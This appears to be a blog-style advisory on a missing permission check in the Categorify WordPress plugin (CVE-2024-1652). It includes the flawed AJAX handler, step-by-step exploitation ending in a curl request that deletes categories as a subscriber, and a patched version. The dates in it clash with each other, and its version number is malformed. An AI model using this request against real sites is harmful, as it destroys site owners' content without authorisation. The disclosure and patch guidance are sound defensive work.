On April 2, 2024, security researchers disclosed CVE-2024-1652, a serious vulnerability in the Categorify plugin for WordPress. It turns out, every version up to 1..7.4 lets even the lowest-privilege users—like regular subscribers—clear out categories from a site. In this deep dive, I’ll show you how the bug works, suggest how to exploit it, help you tell if you’re affected, and point to the best references for more details.
The Root of the Problem
In WordPress, plugins often use special AJAX actions to let users do stuff behind the scenes—like changing settings or updating posts—without reloading the page. Developers are supposed to wrap these actions with capability checks so that only trusted users can make changes.
With the Categorify plugin, there’s a function called categorifyAjaxClearCategory. But it doesn’t check what kind of user is calling it. That means *any logged-in user* can run this code, including ordinary subscribers.
The upshot? Attackers can send a simple request and clear out your categories—disrupting navigation and leaving sites in a mess.
Let’s look at what this might look like (simplified)
// Inside categorify.php:
add_action('wp_ajax_categorify_clear_category', 'categorifyAjaxClearCategory');
function categorifyAjaxClearCategory() {
// MISSING: capability check like current_user_can('manage_categories')
$cat_id = intval($_POST['cat_id']);
wp_delete_category($cat_id);
wp_send_json_success('Category cleared');
}
Here, there’s no check to see if the current user should be allowed to delete categories!
1. Log in as a low-level user
First, register or log in as a subscriber on the target WordPress site.
2. Find a category to delete
View the site’s categories or guess a category’s ID (like 1 for “Uncategorized”).
3. Send the AJAX request
Using your browser’s dev tools or a tool like Postman or curl, send a POST request to this URL:
https://victim.com/wp-admin/admin-ajax.php
cat_id: The category ID you want to clear.
You also need to include your cookies to show you’re logged in.
Example using curl
curl 'https://victim.com/wp-admin/admin-ajax.php' \
-b 'wordpress_logged_in_[hash]=[your_cookie]' \
-d 'action=categorify_clear_category&cat_id=1'
If it works, your chosen category will be deleted. That’s it!
Is My Site Vulnerable?
If you use Categorify and haven’t updated past version 1..7.4, any subscriber on your site could start erasing categories right now.
How To Fix
1. Update the plugin: Check Categorify’s changelog for a fixed version (if available).
Add a manual capability check (if you must patch yourself). Update the function like this
function categorifyAjaxClearCategory() {
if (!current_user_can('manage_categories')) {
wp_send_json_error('Unauthorized', 403);
return;
}
$cat_id = intval($_POST['cat_id']);
wp_delete_category($cat_id);
wp_send_json_success('Category cleared');
}
References
- Official Categorify Plugin on WordPress.org
- Wordfence Advisory
- WPScan Vulnerability Database Entry
- Understanding capabilities in WordPress
Conclusion
CVE-2024-1652 demonstrates how a missing security check can have a big impact—even turning normal users into accidental (or intentional) attackers. If you use Categorify, update fast, and remember: *never trust user input, and never forget capability checks in your plugins.*
Timeline
Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC